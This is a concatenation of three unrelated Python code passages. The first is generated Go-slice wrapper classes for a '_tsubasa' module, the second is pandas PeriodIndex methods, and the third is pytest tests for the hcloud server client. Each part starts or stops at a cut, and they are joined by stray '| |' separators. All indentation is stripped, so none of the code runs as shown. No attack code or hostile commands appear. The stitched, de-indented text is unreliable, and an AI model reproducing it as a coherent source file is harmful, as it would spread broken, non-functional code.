"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step == None or key.step == 1:
st = key.start
ed = key.stop
if st == None:
st = 0
if ed == None:
ed = _tsubasa.Slice_uint_len(self.handle)
return Slice_uint(handle=_tsubasa.Slice_uint_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint16
class Slice_uint16(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=A Go-side object is always initialized with an explicit handle=arg
otherwise parameter is a python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint16_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint16.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint16 len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint16([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint16_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step == None or key.step == 1:
st = key.start
ed = key.stop
if st == None:
st = 0
if ed == None:
ed = _tsubasa.Slice_uint16_len(self.handle)
return Slice_uint16(handle=_tsubasa.Slice_uint16_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint16_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint16_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint16.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint16_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint16_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint32
class Slice_uint32(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=A Go-side object is always initialized with an explicit handle=arg
otherwise parameter is a python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint32_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint32.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint32 len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint32([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint32_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step == None or key.step == 1:
st = key.start
ed = key.stop
if st == None:
st = 0
if ed == None:
ed = _tsubasa.Slice_uint32_len(self.handle)
return Slice_uint32(handle=_tsubasa.Slice_uint32_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint32_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint32_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint32.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint32_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint32_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint64
class Slice_uint64(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=A Go-side object is always initialized with an explicit handle=arg
otherwise parameter is a python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 and 'handle' in kwargs:
self.handle = kwargs['handle']
_tsubasa.IncRef(self.handle)
elif len(args) == 1 and isinstance(args[0], GoClass):
self.handle = args[0].handle
_tsubasa.IncRef(self.handle)
else:
self.handle = _tsubasa.Slice_uint64_CTor()
_tsubasa.IncRef(self.handle)
if len(args) > 0:
if not isinstance(args[0], _collections_abc.Iterable):
raise TypeError('Slice_uint64.__init__ takes a sequence as argument')
for elt in args[0]:
self.append(elt)
def __del__(self):
_tsubasa.DecRef(self.handle)
def __str__(self):
s = 'go.Slice_uint64 len: ' + str(len(self)) + ' handle: ' + str(self.handle) + ' ['
if len(self) < 120:
s += ', '.join(map(str, self)) + ']'
return s
def __repr__(self):
return 'go.Slice_uint64([' + ', '.join(map(str, self)) + '])'
def __len__(self):
return _tsubasa.Slice_uint64_len(self.handle)
def __getitem__(self, key):
if isinstance(key, slice):
if key.step == None or key.step == 1:
st = key.start
ed = key.stop
if st == None:
st = 0
if ed == None:
ed = _tsubasa.Slice_uint64_len(self.handle)
return Slice_uint64(handle=_tsubasa.Slice_uint64_subslice(self.handle, st, ed))
return [self[ii] for ii in range(*key.indices(len(self)))]
elif isinstance(key, int):
if key < 0:
key += len(self)
if key < 0 or key >= len(self):
raise IndexError('slice index out of range')
return _tsubasa.Slice_uint64_elem(self.handle, key)
else:
raise TypeError('slice index invalid type')
def __setitem__(self, idx, value):
if idx < 0:
idx += len(self)
if idx < len(self):
_tsubasa.Slice_uint64_set(self.handle, idx, value)
return
raise IndexError('slice index out of range')
def __iadd__(self, value):
if not isinstance(value, _collections_abc.Iterable):
raise TypeError('Slice_uint64.__iadd__ takes a sequence as argument')
for elt in value:
self.append(elt)
return self
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self):
rv = _tsubasa.Slice_uint64_elem(self.handle, self.index)
self.index = self.index + 1
return rv
raise StopIteration
def append(self, value):
_tsubasa.Slice_uint64_append(self.handle, value)
def copy(self, src):
""" copy emulates the go copy function, copying elements into this list from source list, up to min of size of each list """
mx = min(len(self), len(src))
for i in range(mx):
self[i] = src[i]
# Python type for slice []uint8
class Slice_uint8(GoClass):
""""""
def __init__(self, *args, **kwargs):
"""
handle=A Go-side object is always initialized with an explicit handle=arg
otherwise parameter is a python list that we copy from
"""
self.index = 0
if len(kwargs) == 1 | |
cannot be raised
# from here because numpy catches.
raise ValueError(msg.format(func.__name__))
if is_bool_dtype(result):
return result
# the result is object dtype array of Period
# cannot pass _simple_new as it is
return PeriodIndex(result, freq=self.freq, name=self.name)
@property
def _box_func(self):
return lambda x: Period._from_ordinal(ordinal=x, freq=self.freq)
def _to_embed(self, keep_tz=False):
"""
return an array repr of this object, potentially casting to object
"""
return self.asobject.values
@property
def _formatter_func(self):
return lambda x: "'%s'" % x
def asof_locs(self, where, mask):
"""
where : array of timestamps
mask : array of booleans where data is not NA
"""
where_idx = where
if isinstance(where_idx, DatetimeIndex):
where_idx = PeriodIndex(where_idx.values, freq=self.freq)
locs = self._values[mask].searchsorted(where_idx._values, side='right')
locs = np.where(locs > 0, locs - 1, 0)
result = np.arange(len(self))[mask].take(locs)
first = mask.argmax()
result[(locs == 0) & (where_idx._values < self._values[first])] = -1
return result
@Appender(_index_shared_docs['astype'])
def astype(self, dtype, copy=True, how='start'):
dtype = pandas_dtype(dtype)
if is_object_dtype(dtype):
return self.asobject
elif is_integer_dtype(dtype):
if copy:
return self._int64index.copy()
else:
return self._int64index
elif is_datetime64_dtype(dtype):
return self.to_timestamp(how=how)
elif is_datetime64tz_dtype(dtype):
return self.to_timestamp(how=how).tz_localize(dtype.tz)
elif is_period_dtype(dtype):
return self.asfreq(freq=dtype.freq)
raise ValueError('Cannot cast PeriodIndex to dtype %s' % dtype)
@Substitution(klass='PeriodIndex')
@Appender(_shared_docs['searchsorted'])
@deprecate_kwarg(old_arg_name='key', new_arg_name='value')
def searchsorted(self, value, side='left', sorter=None):
if isinstance(value, Period):
if value.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, value.freqstr)
raise IncompatibleFrequency(msg)
value = value.ordinal
elif isinstance(value, compat.string_types):
value = Period(value, freq=self.freq).ordinal
return self._values.searchsorted(value, side=side, sorter=sorter)
@property
def is_all_dates(self):
return True
@property
def is_full(self):
"""
Returns True if there are any missing periods from start to end
"""
if len(self) == 0:
return True
if not self.is_monotonic:
raise ValueError('Index is not monotonic')
values = self.values
return ((values[1:] - values[:-1]) < 2).all()
def asfreq(self, freq=None, how='E'):
"""
Convert the PeriodIndex to the specified frequency `freq`.
Parameters
----------
freq : str
a frequency
how : str {'E', 'S'}
'E', 'END', or 'FINISH' for end,
'S', 'START', or 'BEGIN' for start.
Whether the elements should be aligned to the end
or start within pa period. January 31st ('END') vs.
Janury 1st ('START') for example.
Returns
-------
new : PeriodIndex with the new frequency
Examples
--------
>>> pidx = pd.period_range('2010-01-01', '2015-01-01', freq='A')
>>> pidx
<class 'pandas.tseries.period.PeriodIndex'>
[2010, ..., 2015]
Length: 6, Freq: A-DEC
>>> pidx.asfreq('M')
<class 'pandas.tseries.period.PeriodIndex'>
[2010-12, ..., 2015-12]
Length: 6, Freq: M
>>> pidx.asfreq('M', how='S')
<class 'pandas.tseries.period.PeriodIndex'>
[2010-01, ..., 2015-01]
Length: 6, Freq: M
"""
how = _validate_end_alias(how)
freq = Period._maybe_convert_freq(freq)
base1, mult1 = _gfc(self.freq)
base2, mult2 = _gfc(freq)
asi8 = self.asi8
# mult1 can't be negative or 0
end = how == 'E'
if end:
ordinal = asi8 + mult1 - 1
else:
ordinal = asi8
new_data = period.period_asfreq_arr(ordinal, base1, base2, end)
if self.hasnans:
new_data[self._isnan] = tslib.iNaT
return self._simple_new(new_data, self.name, freq=freq)
def to_datetime(self, dayfirst=False):
"""
DEPRECATED: use :meth:`to_timestamp` instead.
Cast to DatetimeIndex.
"""
warnings.warn("to_datetime is deprecated. Use self.to_timestamp(...)",
FutureWarning, stacklevel=2)
return self.to_timestamp()
year = _field_accessor('year', 0, "The year of the period")
month = _field_accessor('month', 3, "The month as January=1, December=12")
day = _field_accessor('day', 4, "The days of the period")
hour = _field_accessor('hour', 5, "The hour of the period")
minute = _field_accessor('minute', 6, "The minute of the period")
second = _field_accessor('second', 7, "The second of the period")
weekofyear = _field_accessor('week', 8, "The week ordinal of the year")
week = weekofyear
dayofweek = _field_accessor('dayofweek', 10,
"The day of the week with Monday=0, Sunday=6")
weekday = dayofweek
dayofyear = day_of_year = _field_accessor('dayofyear', 9,
"The ordinal day of the year")
quarter = _field_accessor('quarter', 2, "The quarter of the date")
qyear = _field_accessor('qyear', 1)
days_in_month = _field_accessor('days_in_month', 11,
"The number of days in the month")
daysinmonth = days_in_month
@property
def is_leap_year(self):
""" Logical indicating if the date belongs to a leap year """
return tslib._isleapyear_arr(self.year)
@property
def start_time(self):
return self.to_timestamp(how='start')
@property
def end_time(self):
return self.to_timestamp(how='end')
def _mpl_repr(self):
# how to represent ourselves to matplotlib
return self.asobject.values
def to_timestamp(self, freq=None, how='start'):
"""
Cast to DatetimeIndex
Parameters
----------
freq : string or DateOffset, default 'D' for week or longer, 'S'
otherwise
Target frequency
how : {'s', 'e', 'start', 'end'}
Returns
-------
DatetimeIndex
"""
how = _validate_end_alias(how)
if freq is None:
base, mult = _gfc(self.freq)
freq = frequencies.get_to_timestamp_base(base)
else:
freq = Period._maybe_convert_freq(freq)
base, mult = _gfc(freq)
new_data = self.asfreq(freq, how)
new_data = period.periodarr_to_dt64arr(new_data._values, base)
return DatetimeIndex(new_data, freq='infer', name=self.name)
def _maybe_convert_timedelta(self, other):
if isinstance(other, (timedelta, np.timedelta64, offsets.Tick)):
offset = frequencies.to_offset(self.freq.rule_code)
if isinstance(offset, offsets.Tick):
nanos = tslib._delta_to_nanoseconds(other)
offset_nanos = tslib._delta_to_nanoseconds(offset)
if nanos % offset_nanos == 0:
return nanos // offset_nanos
elif isinstance(other, offsets.DateOffset):
freqstr = other.rule_code
base = frequencies.get_base_alias(freqstr)
if base == self.freq.rule_code:
return other.n
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
elif isinstance(other, np.ndarray):
if is_integer_dtype(other):
return other
elif is_timedelta64_dtype(other):
offset = frequencies.to_offset(self.freq)
if isinstance(offset, offsets.Tick):
nanos = tslib._delta_to_nanoseconds(other)
offset_nanos = tslib._delta_to_nanoseconds(offset)
if (nanos % offset_nanos).all() == 0:
return nanos // offset_nanos
elif is_integer(other):
# integer is passed to .shift via
# _add_datetimelike_methods basically
# but ufunc may pass integer to _add_delta
return other
# raise when input doesn't have freq
msg = "Input has different freq from PeriodIndex(freq={0})"
raise IncompatibleFrequency(msg.format(self.freqstr))
def _add_delta(self, other):
ordinal_delta = self._maybe_convert_timedelta(other)
return self.shift(ordinal_delta)
def _sub_datelike(self, other):
if other is tslib.NaT:
new_data = np.empty(len(self), dtype=np.int64)
new_data.fill(tslib.iNaT)
return TimedeltaIndex(new_data, name=self.name)
return NotImplemented
def _sub_period(self, other):
if self.freq != other.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
asi8 = self.asi8
new_data = asi8 - other.ordinal
if self.hasnans:
new_data = new_data.astype(np.float64)
new_data[self._isnan] = np.nan
# result must be Int64Index or Float64Index
return Index(new_data, name=self.name)
def shift(self, n):
"""
Specialized shift which produces an PeriodIndex
Parameters
----------
n : int
Periods to shift by
Returns
-------
shifted : PeriodIndex
"""
values = self._values + n * self.freq.n
if self.hasnans:
values[self._isnan] = tslib.iNaT
return PeriodIndex(data=values, name=self.name, freq=self.freq)
@cache_readonly
def dtype(self):
return PeriodDtype.construct_from_string(self.freq)
@property
def inferred_type(self):
# b/c data is represented as ints make sure we can't have ambiguous
# indexing
return 'period'
def get_value(self, series, key):
"""
Fast lookup of value from 1-dimensional ndarray. Only use this if you
know what you're doing
"""
s = com._values_from_object(series)
try:
return com._maybe_box(self,
super(PeriodIndex, self).get_value(s, key),
series, key)
except (KeyError, IndexError):
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
grp = frequencies.Resolution.get_freq_group(reso)
freqn = frequencies.get_freq_group(self.freq)
vals = self._values
# if our data is higher resolution than requested key, slice
if grp < freqn:
iv = Period(asdt, freq=(grp, 1))
ord1 = iv.asfreq(self.freq, how='S').ordinal
ord2 = iv.asfreq(self.freq, how='E').ordinal
if ord2 < vals[0] or ord1 > vals[-1]:
raise KeyError(key)
pos = np.searchsorted(self._values, [ord1, ord2])
key = slice(pos[0], pos[1] + 1)
return series[key]
elif grp == freqn:
key = Period(asdt, freq=self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
else:
raise KeyError(key)
except TypeError:
pass
key = Period(key, self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
@Appender(_index_shared_docs['get_indexer'] % _index_doc_kwargs)
def get_indexer(self, target, method=None, limit=None, tolerance=None):
target = _ensure_index(target)
if hasattr(target, 'freq') and target.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, target.freqstr)
raise IncompatibleFrequency(msg)
if isinstance(target, PeriodIndex):
target = target.asi8
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance)
return Index.get_indexer(self._int64index, target, method,
limit, tolerance)
def _get_unique_index(self, dropna=False):
"""
wrap Index._get_unique_index to handle NaT
"""
res = super(PeriodIndex, self)._get_unique_index(dropna=dropna)
if dropna:
res = res.dropna()
return res
def get_loc(self, key, method=None, tolerance=None):
"""
Get integer location for requested label
Returns
-------
loc : int
"""
try:
return self._engine.get_loc(key)
except KeyError:
if is_integer(key):
raise
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
key = asdt
except TypeError:
pass
try:
key = Period(key, freq=self.freq)
except ValueError:
# we cannot construct the Period
# as we have an invalid type
raise KeyError(key)
try:
ordinal = tslib.iNaT if key is tslib.NaT else key.ordinal
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance)
return self._int64index.get_loc(ordinal, method, tolerance)
except KeyError:
raise KeyError(key)
def _maybe_cast_slice_bound(self, label, side, kind):
"""
If label is a string or a datetime, cast it to Period.ordinal according
to resolution.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
bound : Period or object
Notes
-----
Value of `side` parameter should be validated in caller.
"""
assert kind in ['ix', 'loc', 'getitem']
if isinstance(label, datetime):
return Period(label, freq=self.freq)
elif isinstance(label, compat.string_types):
try:
| |
import mock
import pytest
from hcloud.firewalls.client import BoundFirewall
from hcloud.firewalls.domain import Firewall
from hcloud.floating_ips.client import BoundFloatingIP
from hcloud.isos.client import BoundIso
from hcloud.servers.client import ServersClient, BoundServer
from hcloud.servers.domain import (
Server,
PublicNetwork,
IPv4Address,
IPv6Network,
PublicNetworkFirewall,
PrivateNet,
)
from hcloud.volumes.client import BoundVolume
from hcloud.volumes.domain import Volume
from hcloud.images.domain import Image
from hcloud.images.client import BoundImage
from hcloud.isos.domain import Iso
from hcloud.datacenters.client import BoundDatacenter
from hcloud.datacenters.domain import Datacenter
from hcloud.locations.domain import Location
from hcloud.actions.client import BoundAction
from hcloud.server_types.client import BoundServerType
from hcloud.server_types.domain import ServerType
from hcloud.networks.domain import Network
from hcloud.networks.client import BoundNetwork
from hcloud.placement_groups.domain import PlacementGroup
from hcloud.placement_groups.client import BoundPlacementGroup
class TestBoundServer(object):
@pytest.fixture()
def bound_server(self, hetzner_client):
return BoundServer(client=hetzner_client.servers, data=dict(id=14))
def test_bound_server_init(self, response_full_server):
bound_server = BoundServer(
client=mock.MagicMock(), data=response_full_server["server"]
)
assert bound_server.id == 42
assert bound_server.name == "my-server"
assert bound_server.primary_disk_size == 20
assert isinstance(bound_server.public_net, PublicNetwork)
assert isinstance(bound_server.public_net.ipv4, IPv4Address)
assert bound_server.public_net.ipv4.ip == "172.16.58.3"
assert bound_server.public_net.ipv4.blocked is False
assert bound_server.public_net.ipv4.dns_ptr == "server01.example.com"
assert isinstance(bound_server.public_net.ipv6, IPv6Network)
assert bound_server.public_net.ipv6.ip == "2001:db8::/64"
assert bound_server.public_net.ipv6.blocked is False
assert bound_server.public_net.ipv6.network == "2001:db8::"
assert bound_server.public_net.ipv6.network_mask == "64"
assert isinstance(bound_server.public_net.firewalls, list)
assert isinstance(bound_server.public_net.firewalls[0], PublicNetworkFirewall)
firewall = bound_server.public_net.firewalls[0]
assert isinstance(firewall.firewall, BoundFirewall)
assert bound_server.public_net.ipv6.blocked is False
assert firewall.status == PublicNetworkFirewall.STATUS_APPLIED
assert isinstance(bound_server.public_net.floating_ips[0], BoundFloatingIP)
assert bound_server.public_net.floating_ips[0].id == 478
assert bound_server.public_net.floating_ips[0].complete is False
assert isinstance(bound_server.datacenter, BoundDatacenter)
assert (
bound_server.datacenter._client == bound_server._client._client.datacenters
)
assert bound_server.datacenter.id == 1
assert bound_server.datacenter.complete is True
assert isinstance(bound_server.server_type, BoundServerType)
assert (
bound_server.server_type._client
== bound_server._client._client.server_types
)
assert bound_server.server_type.id == 1
assert bound_server.server_type.complete is True
assert len(bound_server.volumes) == 2
assert isinstance(bound_server.volumes[0], BoundVolume)
assert bound_server.volumes[0]._client == bound_server._client._client.volumes
assert bound_server.volumes[0].id == 1
assert bound_server.volumes[0].complete is False
assert isinstance(bound_server.volumes[1], BoundVolume)
assert bound_server.volumes[1]._client == bound_server._client._client.volumes
assert bound_server.volumes[1].id == 2
assert bound_server.volumes[1].complete is False
assert isinstance(bound_server.image, BoundImage)
assert bound_server.image._client == bound_server._client._client.images
assert bound_server.image.id == 4711
assert bound_server.image.name == "ubuntu-20.04"
assert bound_server.image.complete is True
assert isinstance(bound_server.iso, BoundIso)
assert bound_server.iso._client == bound_server._client._client.isos
assert bound_server.iso.id == 4711
assert bound_server.iso.name == "FreeBSD-11.0-RELEASE-amd64-dvd1"
assert bound_server.iso.complete is True
assert len(bound_server.private_net) == 1
assert isinstance(bound_server.private_net[0], PrivateNet)
assert (
bound_server.private_net[0].network._client
== bound_server._client._client.networks
)
assert bound_server.private_net[0].ip == "10.1.1.5"
assert bound_server.private_net[0].mac_address == "86:00:ff:2a:7d:e1"
assert len(bound_server.private_net[0].alias_ips) == 1
assert bound_server.private_net[0].alias_ips[0] == "10.1.1.8"
assert isinstance(bound_server.placement_group, BoundPlacementGroup)
assert (
bound_server.placement_group._client
== bound_server._client._client.placement_groups
)
assert bound_server.placement_group.id == 897
assert bound_server.placement_group.name == "my Placement Group"
assert bound_server.placement_group.complete is True
@pytest.mark.parametrize(
"params",
[
{
"status": [Server.STATUS_RUNNING],
"sort": "status",
"page": 1,
"per_page": 10,
},
{},
],
)
def test_get_actions_list(
self, hetzner_client, bound_server, response_get_actions, params
):
hetzner_client.request.return_value = response_get_actions
result = bound_server.get_actions_list(**params)
hetzner_client.request.assert_called_with(
url="/servers/14/actions", method="GET", params=params
)
actions = result.actions
assert result.meta is None
assert len(actions) == 1
assert isinstance(actions[0], BoundAction)
assert actions[0].id == 13
assert actions[0].command == "start_server"
@pytest.mark.parametrize(
"params", [{"status": [Server.STATUS_RUNNING], "sort": "status"}, {}]
)
def test_get_actions(
self, hetzner_client, bound_server, response_get_actions, params
):
hetzner_client.request.return_value = response_get_actions
actions = bound_server.get_actions(**params)
params.update({"page": 1, "per_page": 50})
hetzner_client.request.assert_called_with(
url="/servers/14/actions", method="GET", params=params
)
assert len(actions) == 1
assert isinstance(actions[0], BoundAction)
assert actions[0].id == 13
assert actions[0].command == "start_server"
def test_update(self, hetzner_client, bound_server, response_update_server):
hetzner_client.request.return_value = response_update_server
server = bound_server.update(name="new-name", labels={})
hetzner_client.request.assert_called_with(
url="/servers/14", method="PUT", json={"name": "new-name", "labels": {}}
)
assert server.id == 14
assert server.name == "new-name"
def test_delete(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.delete()
hetzner_client.request.assert_called_with(url="/servers/14", method="DELETE")
assert action.id == 1
assert action.progress == 0
def test_power_off(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.power_off()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/poweroff", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_power_on(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.power_on()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/poweron", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_reboot(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.reboot()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/reboot", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_reset(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.reset()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/reset", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_shutdown(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.shutdown()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/shutdown", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_reset_password(
self, hetzner_client, bound_server, response_server_reset_password
):
hetzner_client.request.return_value = response_server_reset_password
response = bound_server.reset_password()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/reset_password", method="POST"
)
assert response.action.id == 1
assert response.action.progress == 0
assert response.root_password == "<PASSWORD>"
def test_change_type(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.change_type(ServerType(name="cx11"), upgrade_disk=True)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_type",
method="POST",
json={"server_type": "cx11", "upgrade_disk": True},
)
assert action.id == 1
assert action.progress == 0
def test_enable_rescue(
self, hetzner_client, bound_server, response_server_enable_rescue
):
hetzner_client.request.return_value = response_server_enable_rescue
response = bound_server.enable_rescue(type="linux64")
hetzner_client.request.assert_called_with(
url="/servers/14/actions/enable_rescue",
method="POST",
json={"type": "linux64"},
)
assert response.action.id == 1
assert response.action.progress == 0
assert response.root_password == "<PASSWORD>"
def test_disable_rescue(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.disable_rescue()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/disable_rescue", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_create_image(
self, hetzner_client, bound_server, response_server_create_image
):
hetzner_client.request.return_value = response_server_create_image
response = bound_server.create_image(description="my image", type="snapshot")
hetzner_client.request.assert_called_with(
url="/servers/14/actions/create_image",
method="POST",
json={"description": "my image", "type": "snapshot"},
)
assert response.action.id == 1
assert response.action.progress == 0
assert response.image.description == "my image"
def test_rebuild(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.rebuild(Image(name="ubuntu-20.04"))
hetzner_client.request.assert_called_with(
url="/servers/14/actions/rebuild",
method="POST",
json={"image": "ubuntu-20.04"},
)
assert action.id == 1
assert action.progress == 0
def test_enable_backup(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.enable_backup()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/enable_backup", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_disable_backup(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.disable_backup()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/disable_backup", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_attach_iso(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.attach_iso(Iso(name="FreeBSD-11.0-RELEASE-amd64-dvd1"))
hetzner_client.request.assert_called_with(
url="/servers/14/actions/attach_iso",
method="POST",
json={"iso": "FreeBSD-11.0-RELEASE-amd64-dvd1"},
)
assert action.id == 1
assert action.progress == 0
def test_detach_iso(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.detach_iso()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/detach_iso", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_change_dns_ptr(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.change_dns_ptr("172.16.58.3", "example.com")
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_dns_ptr",
method="POST",
json={"ip": "172.16.58.3", "dns_ptr": "example.com"},
)
assert action.id == 1
assert action.progress == 0
def test_change_protection(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.change_protection(True, True)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_protection",
